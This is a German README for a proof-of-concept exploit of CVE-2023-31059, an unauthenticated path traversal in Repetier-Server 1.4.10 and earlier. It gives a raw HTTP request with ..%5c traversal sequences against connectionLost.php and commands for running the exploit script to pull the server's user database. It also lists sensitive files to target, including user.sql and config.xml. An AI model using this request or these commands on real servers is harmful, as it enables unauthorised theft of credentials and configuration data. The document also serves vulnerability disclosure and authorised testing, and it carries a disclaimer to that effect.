
Proof-of-Concept-Exploit für CVE-2023-31059, eine nicht authentifizierte Path Traversal in Repetier-Server ≤1.4.10, die beliebiges Dateilesen über manipulierte HTTP-Anfragen ermöglicht.
Autor: Mohammed Idrees Banyamer
Rolle: Sicherheitsforscher
Land: Jordanien 🇯🇴
Proof‑of‑concept-Exploit für eine unauthentifizierte Remote-Pfad-Traversal-/LFI-Schwachstelle in Repetier‑Server ≤ 1.4.10.
Die Schwachstelle ermöglicht das beliebige Lesen von Dateien über manipulierte ..%5c-Sequenzen im Endpunkt connectionLost.php.
| Feld | Wert |
|---|
| Produkt | Repetier‑Server |
| Betroffen | ≤ 1.4.10 |
| CVE | CVE‑2023‑31059 |
| Typ | Pfad-Traversal / LFI |
| Authentifizierung | Keine |
| Vektor | Netzwerk |
| Auswirkung | Beliebiges Lesen von Dateien |
| CVSS | 9.8 Kritisch |
flowchart LR
A[Attacker] -->|HTTP request with ..%5c traversal| B[Repetier Server]
B --> C[base/connectionLost.php]
C -->|Unsanitized file parameter| D[Windows Filesystem]
D --> E[Sensitive File]
E --> B
B -->|File contents in HTTP response| AGET /base/connectionLost.php?file=..%5c..%5cWindows%5cwin.ini HTTP/1.1
Host: target:3344
# Test vulnerability
python3 CVE-2023-31059.py http://<target-ip>:3344/ --test
# Extract user database
python3 CVE-2023-31059.py http://<target-ip>:3344/ \
--file "ProgramData\\Repetier-Server\\database\\user.sql" \
--depth 20
pip install requests
ProgramData\Repetier-Server\database\user.sql
ProgramData\Repetier-Server\config.xml
Windows\win.ini
Windows\System32\drivers\etc\hosts
Dieser PoC dient ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests. Verwenden Sie ihn nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Genehmigung zum Testen haben.
GitHub: https://github.com/mbanyamer